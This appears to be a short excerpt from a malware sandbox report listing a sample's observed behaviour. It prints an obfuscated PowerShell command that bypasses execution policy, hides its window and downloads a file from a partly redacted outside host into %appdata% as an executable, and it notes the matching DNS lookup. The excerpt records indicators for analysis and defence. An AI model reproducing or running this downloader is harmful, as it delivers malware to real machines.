Technical Information
- http://lt###.cheasrock.pl/file/jet.jkl as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OweRShe^LL^.Exe -EXeCutIO^npO^LiCy b^Y^paSS ^-n^oprO^filE^ ^-w^Ind^oWS^TYLE^ hiddE^n (nEw-oB^JecT sy^sTE^m^.Ne^T.wEB^c^Li^eNT).^DOw^nL^o^A^df^il^e(^'http://lt###.cheasrock.pl/file/...
- DNS ASK lt###.cheasrock.pl
- '<SYSTEM32>\cmd.exe' /c "P^OweRShe^LL^.Exe -EXeCutIO^npO^LiCy b^Y^paSS ^-n^oprO^filE^ ^-w^Ind^oWS^TYLE^ hiddE^n (nEw-oB^JecT sy^sTE^m^.Ne^T.wEB^c^Li^eNT).^DOw^nL^o^A^df^il^e(^'http://lt###.cheasrock.pl/file/...' (with hidden window)